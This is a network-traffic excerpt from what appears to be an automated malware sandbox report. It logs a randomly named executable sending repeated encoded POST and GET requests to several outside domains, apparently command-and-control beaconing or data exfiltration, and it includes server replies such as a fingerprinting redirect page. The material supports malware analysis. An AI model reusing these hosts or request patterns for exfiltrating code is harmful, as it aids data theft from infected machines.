                                                        Data Ascii: x0wHoJ8X=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThylZfNe3LZH8luRTJC5SCXgGP2t8rowWNA6jIeytFdfL37ezCEhnFX2QcECpcCXM1jXjglfk+lFrRwlYP1LwNOqPIDVJVrBep4eohsGFWiBJdhn4dwziZ54rrzOEPqMPK1rOB1rpwkjgfIXy9YsEghOFXGtKI6VYcxHk3rsMfyKyiboFSXB9
                                                        Sep 18, 2024 16:20:29.401736975 CEST876INHTTP/1.1 200 OK
                                                        date: Wed, 18 Sep 2024 14:20:29 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1726669229.4590276; expires=Sat, 16-Sep-2034 14:20:29 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 581
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                        Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.553653103.224.182.242801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:31.624845982 CEST1865OUTPOST /pp43/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.nobartv6.website
                                                        Origin: http://www.nobartv6.website
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.nobartv6.website/pp43/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 64 5a 44 75 57 33 5a 4f 54 38 6b 75 52 54 41 69 35 54 43 58 68 45 50 77 46 34 72 6f 4d 47 4e 47 2b 6a 4a 39 71 74 4f 4d 66 4c 75 72 65 7a 64 55 68 6d 4b 33 33 4b 63 45 53 74 63 44 6e 4d 31 6a 58 6a 67 69 76 6b 33 55 46 72 58 77 6c 66 66 46 4c 38 4a 4f 71 6a 49 44 4e 5a 56 6f 74 67 6f 4d 69 6f 68 4d 57 46 47 41 5a 4a 52 68 6e 2b 61 77 79 68 5a 35 6b 4f 72 7a 54 39 50 70 51 6c 4b 32 37 4f 43 6a 75 4f 74 6d 72 50 41 6f 33 70 36 6f 64 69 2f 6d 36 77 49 51 70 75 43 4b 35 69 63 46 58 79 38 62 41 49 55 42 4c 35 33 39 49 44 56 77 4e 79 73 47 52 72 59 58 41 78 4b 2b 48 43 34 34 4e 34 73 65 43 35 4a 4d 2b 4e 79 6c 4c 4f 4c 53 32 61 45 31 75 58 7a 32 46 70 78 61 56 39 7a 69 75 69 61 52 74 6c 4c 5a 76 62 77 5a 52 59 50 72 55 78 71 62 4f 6c 69 37 56 6a 38 45 56 69 64 65 4e 61 6b 75 73 48 48 50 73 31 52 4d 38 41 32 55 6a 50 36 2b 6d 55 78 51 78 2b 73 37 4d 42 54 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThydZDuW3ZOT8kuRTAi5TCXhEPwF4roMGNG+jJ9qtOMfLurezdUhmK33KcEStcDnM1jXjgivk3UFrXwlffFL8JOqjIDNZVotgoMiohMWFGAZJRhn+awyhZ5kOrzT9PpQlK27OCjuOtmrPAo3p6odi/m6wIQpuCK5icFXy8bAIUBL539IDVwNysGRrYXAxK+HC44N4seC5JM+NylLOLS2aE1uXz2FpxaV9ziuiaRtlLZvbwZRYPrUxqbOli7Vj8EVideNakusHHPs1RM8A2UjP6+mUxQx+s7MBTaetQYwf5gfkIpIvSm+SN4B3CAPRs7Mv9RLd4M363hoxizoxN4zEE3kE+au5my2Cy1zt7r64ti89c7j0qhKlnWWgCkWf3w7FAZkMkD1mfvfIIKH3IML1Y+tdy2cTg/fxui0iabl1d/VHZ5A4SEhS/kk2nZJ9kIcVE0vunFpm2PwE98FnqJeCBoFKagbwYbVz3bB1db0Pe/tU5JYZhL6tVtq/qNh+qlAKgEAXX9fpLM+htjg3VD7LS57GUxIDd1LRt2RdB6rLaDnjoUnpl/SZAeWrXetOZXzQG0TSDSV0maFyGlMTPcWpGEfFbgUr3Rbc0Cz9/jj+eqfo1ch3Kj8rbWKsCiL10AiwksIGlSaL40VS8jGYTKnhJ2eecubRnSXudjZfxfBtX6yeBwDRkG6hvvTRCSgJZ4QkmIYPeLW5Ebob0eLhOBN3wY+6Xbt8S1WmdMA0NgcK23CHDaJxBCmW8+uYn2XWu1fVVoK2hI/PJ+QR2kAhNkfDOgnJHmKjxpJrkpWzWwgf07RZZTfj4YWuNhUuvNyvGn2tU1W4nbJFjaHHsbnp7HuCkGxOucfVHCCD0wLb8nxcYLdB2/7drK2wl5vbVJO+xIzvy0zKOHcBO6jUcZ9t98acoXq05hfci9kAIvQ8a6WM0PsKlJZhDX1kjtoDrJeeHWu31TG [TRUNCATED]
                                                        Sep 18, 2024 16:20:32.376797915 CEST876INHTTP/1.1 200 OK
                                                        date: Wed, 18 Sep 2024 14:20:32 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1726669232.6762876; expires=Sat, 16-Sep-2034 14:20:32 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 581
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                        Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.553654103.224.182.242801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:34.163423061 CEST565OUTGET /pp43/?x0wHoJ8X=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVibvWBC9TblfPfUaDIhDj5FTVmS3R8lZAXA12CkSIDeX1TA==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.nobartv6.website
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:20:34.793801069 CEST1236INHTTP/1.1 200 OK
                                                        date: Wed, 18 Sep 2024 14:20:34 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1726669234.8772544; expires=Sat, 16-Sep-2034 14:20:34 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-length: 1544
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 2f 70 70 34 33 2f 3f 78 30 77 48 6f 4a 38 58 3d 2f 79 7a 43 62 6c 72 4a 73 45 52 75 71 67 7a 7a 76 70 62 46 68 45 5a 58 50 72 45 64 52 4f 67 75 2b 36 5a 68 38 2f 38 59 71 42 30 31 46 75 4f 2b 44 4c 58 66 67 63 6c 76 48 6e 74 33 43 57 4e 75 47 6c 6c 58 74 70 30 38 47 6e 4c 51 4b 4a 32 69 43 74 6a 56 69 62 76 57 42 43 39 54 62 6c 66 50 66 55 61 44 49 68 44 6a 35 46 54 56 6d 53 33 52 38 6c 5a 41 58 41 31 32 43 [TRUNCATED]
                                                        Data Ascii: <html><head><title>nobartv6.website</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.nobartv6.website/pp43/?x0wHoJ8X=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVibvWBC9TblfPfUaDIhDj5FTVmS3R8lZAXA12CkSIDeX1TA==&2VDlJ=Z2VdhTx&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><
                                                        Sep 18, 2024 16:20:34.796257019 CEST580INData Raw: 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f
                                                        Data Ascii: body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.nobartv6.website/pp43/?x0wHoJ8X=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVibvWBC9TblfPfUaDIhDj5FTVmS3R8lZAXA12CkSI


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.55365585.159.66.93801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:39.942718983 CEST816OUTPOST /lrst/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.sailnway.net
                                                        Origin: http://www.sailnway.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.sailnway.net/lrst/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 52 75 6b 69 33 74 64 73 37 58 65 4f 73 54 68 56 62 32 63 63 74 6c 62 55 46 31 56 42 66 66 4e 56 43 46 56 6d 50 70 79 65 35 33 42 4d 4b 66 33 4b 45 47 47 35 74 76 72 6b 6f 76 70 44 74 49 35 6e 6c 78 4b 51 70 4e 53 37 52 47 4c 77 4e 67 75 5a 50 38 39 6a 35 31 52 73 6a 65 72 66 51 51 49 42 33 67 56 63 66 44 62 31 33 63 4d 53 77 50 51 56 54 55 30 76 36 4a 35 2b 4a 31 78 69 5a 6f 39 65 4a 4e 64 50 2b 74 45 4c 51 69 44 4d 69 4d 48 71 31 43 50 57 6f 6e 41 2b 4f 56 53 63 54 39 76 6d 6c 67 48 6f 31 4b 46 37 32 70 2f 4a 6c 6d 65 31 4c 39 46 4c 4f 62 4b 69 49 62 6b 3d
                                                        Data Ascii: x0wHoJ8X=rBDGnmFpclO/Ruki3tds7XeOsThVb2cctlbUF1VBffNVCFVmPpye53BMKf3KEGG5tvrkovpDtI5nlxKQpNS7RGLwNguZP89j51RsjerfQQIB3gVcfDb13cMSwPQVTU0v6J5+J1xiZo9eJNdP+tELQiDMiMHq1CPWonA+OVScT9vmlgHo1KF72p/Jlme1L9FLObKiIbk=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.55365685.159.66.93801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:42.499346972 CEST836OUTPOST /lrst/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.sailnway.net
                                                        Origin: http://www.sailnway.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.sailnway.net/lrst/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 35 56 43 6e 4e 6d 4f 6f 79 65 30 58 42 4d 41 2f 33 31 61 32 47 69 74 76 75 62 6f 75 56 44 74 49 39 6e 6c 78 61 51 6f 36 2b 30 51 57 4c 79 4c 67 75 66 4c 38 39 6a 35 31 52 73 6a 65 75 58 51 51 77 42 33 52 46 63 65 68 7a 71 35 38 4d 64 67 66 51 56 58 55 30 72 36 4a 35 51 4a 77 56 49 5a 72 46 65 4a 4d 74 50 2f 38 45 4d 48 53 44 4b 6d 4d 47 70 6b 42 32 68 6d 47 6f 51 4e 58 61 62 4c 4e 7a 74 74 32 71 43 76 6f 4e 54 6c 4a 54 78 31 31 57 43 61 4e 6b 69 55 34 61 53 57 4d 7a 36 66 62 59 39 55 48 62 65 44 4c 49 37 41 70 4b 78 32 72 55 30
                                                        Data Ascii: x0wHoJ8X=rBDGnmFpclO/De0i4u1ssHf8jzhVAmcQtlnUFw5Ret5VCnNmOoye0XBMA/31a2GitvubouVDtI9nlxaQo6+0QWLyLgufL89j51RsjeuXQQwB3RFcehzq58MdgfQVXU0r6J5QJwVIZrFeJMtP/8EMHSDKmMGpkB2hmGoQNXabLNztt2qCvoNTlJTx11WCaNkiU4aSWMz6fbY9UHbeDLI7ApKx2rU0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.55365785.159.66.93801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:45.041285038 CEST1853OUTPOST /lrst/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.sailnway.net
                                                        Origin: http://www.sailnway.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.sailnway.net/lrst/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 42 56 43 30 46 6d 4f 4c 61 65 31 58 42 4d 65 76 33 30 61 32 47 76 74 72 44 53 6f 75 5a 54 74 4e 68 6e 6e 53 43 51 76 49 47 30 65 6d 4c 79 47 41 75 65 50 38 39 71 35 31 42 67 6a 65 65 58 51 51 77 42 33 53 74 63 62 44 62 71 70 4d 4d 53 77 50 51 5a 54 55 31 4f 36 4a 78 6d 4a 78 56 79 65 62 6c 65 51 73 39 50 79 75 38 4d 46 79 44 49 71 73 47 4c 6b 41 4b 2b 6d 47 6b 32 4e 57 66 4f 4c 50 7a 74 75 67 57 56 38 4c 68 38 35 6f 44 32 6c 32 57 66 4c 6f 4d 73 65 75 61 38 4b 65 37 6e 62 59 6f 43 44 6a 37 68 46 5a 39 6f 43 64 75 4c 6e 2f 70 7a 39 36 55 73 6c 30 37 52 30 6b 74 59 69 6a 74 51 6e 69 66 43 4a 39 32 64 4d 4f 78 74 4d 48 58 6a 76 47 33 42 6e 75 67 72 78 30 31 2b 63 49 31 6e 42 47 71 6f 36 6e 35 42 53 69 53 6f 50 48 56 70 39 6f 58 43 47 49 58 67 6b 4b 4b 38 76 4b 65 30 77 4c 2f 65 30 37 39 38 74 62 57 51 6e 63 55 49 46 44 4c 6f 51 45 53 74 74 51 36 4e 58 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=rBDGnmFpclO/De0i4u1ssHf8jzhVAmcQtlnUFw5RetBVC0FmOLae1XBMev30a2GvtrDSouZTtNhnnSCQvIG0emLyGAueP89q51BgjeeXQQwB3StcbDbqpMMSwPQZTU1O6JxmJxVyebleQs9Pyu8MFyDIqsGLkAK+mGk2NWfOLPztugWV8Lh85oD2l2WfLoMseua8Ke7nbYoCDj7hFZ9oCduLn/pz96Usl07R0ktYijtQnifCJ92dMOxtMHXjvG3Bnugrx01+cI1nBGqo6n5BSiSoPHVp9oXCGIXgkKK8vKe0wL/e0798tbWQncUIFDLoQESttQ6NXkOOhblCOTEBJDrfGt9USgbp236L+cSYygbOjwSwpTIZS04g1jmUuIi/W/MimyJBx7l8s0CJ9JLwPAQMzAfB8cxfRAbEAXEbGhx79Dx1YBcK8M7NaCxf0252YcN0SOnfbN+j1kqujECuRQjMgKPVXH+lpWpLSvd//ptoTsxyVrOz0AECKGTs2VEwS8ICHZH0WkH29DRUm47S6yYI9ftvuzly/KOgut8LJOfANkTrPgdGdUDgwktzrMSJydwYVQb0XCcNc0Z704kVf76l6jsU0QxumORqGvuYPFPPVJQDQeVON23XZj1EAelK7WDxuG5qYG0F20syeV5UTpgEBS7HigmCnaLZc2hfxkMnR9f1pWzq9JF2v7RgPMfUfsKvdEwUf+zacI6WkP6EVmGu0g+6RBqOp2bWsvOZXPo/RlKgUt6MiLn8XKSC9kLRm9RdiFpfgnbjEWpUn27s8w98TLwZ21f8yYLJYiJXAQ/9MyRD/UJ0OgXIbC7fqMpOY2Y01vFlChMug6MhL8cVLSyKrw01T+VeKX9FPBQfp6Mgo4NUimE+Hlnb3c/3C6rW0MbS9M1MJLQA6xrN3pN2dV1rDj2BMSJzFsHG7xtPHWMuqPcIy/9ULqRWVvAku7TUolsgvaU55LNxFz5VxZlPKRQQg+3DPZM/Gal10QgDspR [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.55365885.159.66.93801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:47.583436012 CEST561OUTGET /lrst/?x0wHoJ8X=mDrmkSN/AS2kB6l18epq8nmRkgENFEghmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KQHyUFQSAc8UP525zlOX/aW9T9BNmWB7W/bov9uBpemVAjQ==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.sailnway.net
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:20:48.478960991 CEST225INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.14.1
                                                        Date: Wed, 18 Sep 2024 14:20:48 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        X-Rate-Limit-Limit: 5s
                                                        X-Rate-Limit-Remaining: 19
                                                        X-Rate-Limit-Reset: 2024-09-18T14:20:53.2672313Z


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.553659188.114.97.3801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:53.578528881 CEST813OUTPOST /mquw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.chinaen.org
                                                        Origin: http://www.chinaen.org
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.chinaen.org/mquw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 77 58 4a 6b 44 51 53 72 66 4f 39 38 45 4d 59 42 54 77 6a 4f 6f 6e 6e 6a 59 71 50 68 56 79 48 4e 46 53 63 73 4a 78 44 7a 57 57 66 41 62 32 72 64 77 6e 7a 66 7a 68 66 56 56 6d 46 45 54 31 6e 58 41 39 42 4d 74 58 32 56 34 39 49 4b 44 51 5a 47 45 33 5a 72 6e 54 75 4e 73 72 4b 4f 70 41 4c 54 64 34 42 58 34 51 56 55 37 34 58 48 61 77 4c 4a 51 45 68 32 76 4e 71 4c 74 4e 69 4f 66 53 31 63 42 68 45 6f 74 6d 63 37 43 69 6c 63 6a 4d 6b 61 78 65 79 4f 68 6f 69 72 73 34 78 48 68 65 69 54 36 61 6c 4b 79 37 75 47 68 30 62 37 42 68 52 30 69 4d 63 4c 65 4c 6b 78 76 72 2f 6f 53 4c 6c 78 6f 50 36 78 75 55 30 3d
                                                        Data Ascii: x0wHoJ8X=wXJkDQSrfO98EMYBTwjOonnjYqPhVyHNFScsJxDzWWfAb2rdwnzfzhfVVmFET1nXA9BMtX2V49IKDQZGE3ZrnTuNsrKOpALTd4BX4QVU74XHawLJQEh2vNqLtNiOfS1cBhEotmc7CilcjMkaxeyOhoirs4xHheiT6alKy7uGh0b7BhR0iMcLeLkxvr/oSLlxoP6xuU0=
                                                        Sep 18, 2024 16:20:54.781192064 CEST1236INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:20:54 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Product: Z-BlogPHP 1.7.3
                                                        X-XSS-Protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYi0fVvSiCoyH6lo5%2FmmUEXnl2Wn%2B2ThhMoUXgcvOf0xfOY%2F0rwo6Fl7XiDBgeTJ1mClj3WFcn8Iu%2BY6q6IE%2FwsRVXIkLfnbc8rMO7LaDOlA2KOVCB8Tb24DP%2Fikxsk4QhA%3D"}],"group":"cf-nel","max_age":604800}
